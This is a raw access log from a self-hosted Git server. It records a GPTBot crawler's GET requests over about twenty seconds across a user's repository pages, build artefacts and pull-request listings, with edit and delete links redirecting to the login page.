"/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 1011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10578] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9898] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 9815] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" -[17/Feb/2026:17:40:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:17:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:17:40:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" -[17/Feb/2026:17:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug" -[17/Feb/2026:17:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9872] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" -[17/Feb/2026:17:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug" -[17/Feb/2026:17:40:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:17:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10963] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" -[17/Feb/2026:17:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug" -[17/Feb/2026:17:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10306] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:17:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:17:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:17:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:17:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9863] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:17:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9865] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:17:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 10306] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:17:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:17:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:17:40:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:17:40:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:17:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:17:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 1013] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:17:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" -[17/Feb/2026:17:40:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:17:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:40:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:17:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" -[17/Feb/2026:17:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:17:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:17:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec?display=source" [Client 74.7.227.38] [Length 12586] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_debug.spec" -[17/Feb/2026:17:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr 